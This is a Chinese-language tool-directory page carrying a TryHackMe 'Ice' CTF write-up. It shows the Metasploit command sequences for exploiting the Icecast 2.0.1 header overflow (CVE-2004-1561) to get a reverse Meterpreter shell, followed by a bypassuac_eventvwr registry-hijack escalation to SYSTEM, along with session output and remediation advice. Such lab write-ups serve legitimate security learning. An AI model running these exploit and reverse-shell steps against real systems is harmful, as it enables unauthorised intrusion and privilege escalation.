Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
thm-ice-icecast-rce-privesc — TryHackMe 的 Ice 靶机完全攻陷 — 通过缓冲区溢出利用 Icecast 2.0.1 远程代码执行漏洞(CVE-2004-1561),随后通过 UAC 绕过 / COM 劫持实现 Windows 权限提升。包含详细的方法论与修复建议。 | Kitploit
工具/GitHubGitHub/monseigneurpatas/thm-ice-icecast-rce-privesc
权限提升侦察漏洞分析漏洞利用CTF渗透测试学习与教育二进制利用
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
monseigneurpatas/thm-ice-icecast-rce-privesc

thm-ice-icecast-rce-privesc

TryHackMe 的 Ice 靶机完全攻陷 — 通过缓冲区溢出利用 Icecast 2.0.1 远程代码执行漏洞(CVE-2004-1561),随后通过 UAC 绕过 / COM 劫持实现 Windows 权限提升。包含详细的方法论与修复建议。

查看仓库
22个月前尚未审核

TryHackMe — Ice:Icecast 2.0.1 RCE 与 Windows 权限提升

平台: TryHackMe 目标系统: Windows 7 / Windows Server 2008 R2 难度: 简单 类别: 缓冲区溢出(RCE)、本地权限提升


摘要

本报告记录了 TryHackMe 上 Ice 机器的完整攻陷过程,从初始侦察到 SYSTEM 级权限提升。目标主机运行着过时的 Icecast 2.0.1 流媒体服务器,存在远程缓冲区溢出漏洞(CVE-2004-1561),可通过精心构造的 HTTP 请求头执行任意代码。初始访问是通过 Meterpreter 反向 shell 以低权限用户身份获得的。随后,通过滥用 Windows COM 对象劫持漏洞(bypassuac_eventvwr),利用自动提升权限的二进制文件以及 HKCU 下的注册表项重定向,实现了向 NT AUTHORITY\SYSTEM 的权限提升。

阶段技术结果
侦察arp-scan、nmap识别出主机及 7 个开放端口
初始访问Icecast HTTP 请求头缓冲区溢出(CVE-2004-1561)以本地用户身份获取 Meterpreter 会话
权限提升bypassuac_eventvwr(COM/注册表劫持)SYSTEM shell

1. 侦察

1.1 主机发现

使用 ARP 扫描识别目标在本地网络中的 IP 地址。

root@kitploit:~
arp-scan -l

ARP 扫描与 Nmap 结果

目标主机地址为 192.168.37.138。

1.2 端口与服务枚举

对目标执行了带服务/版本探测的全量 SYN 扫描:

root@kitploit:~
nmap -sS -sV 192.168.37.138

结果:

主机指纹识别为 DARK-PC,一台 Windows 机器。运行 Icecast 的 8000 端口是最有前景的攻击面——它不是标准的 Windows 服务,且已知存在历史 CVE 漏洞。


2. 漏洞识别

搜索已知的 Icecast 漏洞后发现 CVE-2004-1561:

Icecast 2.0.1 及更早版本中存在缓冲区溢出漏洞,远程攻击者可通过发送包含大量请求头的 HTTP 请求来执行任意代码。

确认存在匹配的 Metasploit 模块:

root@kitploit:~
search CVE-2004-1561

Metasploit 中的 CVE 搜索

root@kitploit:~
exploit/windows/http/icecast_header   2004-09-28   great   No   Icecast Header Overwrite

3. 漏洞利用 — 初始访问

3.1 根本原因

Icecast 2.0.1 未能正确地对所处理的 HTTP 请求头数量进行边界检查。当发送的请求头数量超过服务器缓冲区所能容纳的上限时,多余的数据会溢出到相邻内存,覆盖预留的请求头解析缓冲区之外的数据。

具体而言,溢出会破坏栈上的保存的返回地址(EIP)——即 CPU 在请求处理函数返回后将要跳回的地址。攻击者通过控制该地址,可以将执行流重定向到攻击者提供的 shellcode,而非合法的返回点,从而以 Icecast 进程的上下文执行任意代码。

3.2 模块配置

root@kitploit:~
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

利用选项及成功执行

3.3 执行

root@kitploit:~
exploit
root@kitploit:~
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)

以低权限用户身份建立了 Meterpreter 会话。


4. 权限提升

4.1 本地漏洞利用建议器

在会话激活后,使用 Metasploit 内置的 suggester 来识别目标在当前补丁级别下可行的本地权限提升路径:

root@kitploit:~
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

本地漏洞利用建议器结果

多个模块被标记为可能可行,其中包括针对未打补丁的 Windows 7 / Server 2008 R2 主机的 bypassuac_eventvwr。

4.2 根本原因 — 通过 COM 劫持绕过 UAC

该权限提升路径滥用了 Windows 的 COM(组件对象模型) 架构,该架构允许用不同语言编写的组件互操作。COM 对象通常依赖共享的 DLL,系统通过注册表路径(包括存储在当前用户 HKCU 配置单元下的路径)来解析某个 COM 对象应加载哪个 DLL。

eventvwr.exe 是一个自动提升权限的 Windows 二进制文件(在默认 UAC 配置下,由于其清单设置,它会静默触发 UAC 提升提示而不显示提示本身)。运行时,它会查询 HKCU 以解析 COM 对象并加载其关联的 DLL。

该利用程序劫持了这一查找过程:它在当前用户的 HKCU 配置单元下写入一个恶意注册表项,使 COM 解析指向攻击者控制的载荷,而非合法的系统 DLL。由于 eventvwr.exe 会自动提升权限,它所触发的载荷(此处为命令 shell)将按照 eventvwr.exe 所提升到的完整性级别执行,从而将会话从标准用户提升到更高权限的上下文,且全程不显示可见的 UAC 提示。

4.3 执行

root@kitploit:~
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

权限提升利用成功

root@kitploit:~
[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...

C:\Windows\system32>

随后打开了一个具有提权 shell 的第二个 Meterpreter 会话,直接落入 C:\Windows\system32,确认权限提升成功。


5. 发现总结

#发现严重程度CVE / 参考
1Icecast 2.0.1 HTTP 请求头缓冲区溢出导致远程代码执行

6. 修复建议

  1. 修补或替换 Icecast。 2.0.1 版本已过时二十多年;请升级到最新的维护版本,若该服务未被使用则应将其停用。
  2. 限制暴露范围,仅允许流媒体/媒体服务在内部网络中访问——在没有明确业务需求的情况下,不应可从互联网或整个局域网访问。
  3. 应用最新的 Windows 更新。 eventvwr.exe 自动提升滥用已在后续 Windows 版本中得到修复;该攻击对已完全更新的现代 Windows 版本无效。
  4. 强化 UAC 设置,使用"始终通知"而非默认级别,这样可以封堵多种静默自动提升的滥用路径。
  5. 最小权限原则: 被入侵的账户本不应属于本地 Administrators 组,正是该组成员身份才使 UAC 绕过技术得以成功。

使用的工具

  • arp-scan、nmap — 侦察
  • Metasploit Framework(msfconsole)— 漏洞利用与后渗透
  • Meterpreter — 后渗透 shell

展现的技能

  • 网络侦察与服务枚举
  • CVE 研究与漏洞-利用程序映射
  • 内存破坏 / 缓冲区溢出利用概念(EIP 覆写)
  • Windows 内部机制:COM 对象解析、注册表劫持、UAC 绕过原理
  • 完整攻击链文档化(侦察 → 漏洞利用 → 提权 → 修复)
下载工具
端口服务版本
135/tcpmsrpcMicrosoft Windows RPC
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
445/tcpmicrosoft-dsWindows 7–10 (workgroup: WORKGROUP)
5357/tcphttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcphttpIcecast 流媒体服务器
49152–49157/tcpmsrpcMicrosoft Windows RPC
严重
CVE-2004-1561
2通过 COM/注册表劫持绕过 UAC(eventvwr.exe 自动提升)高Windows 7/Server 2008 R2 已知的 UAC 设计缺陷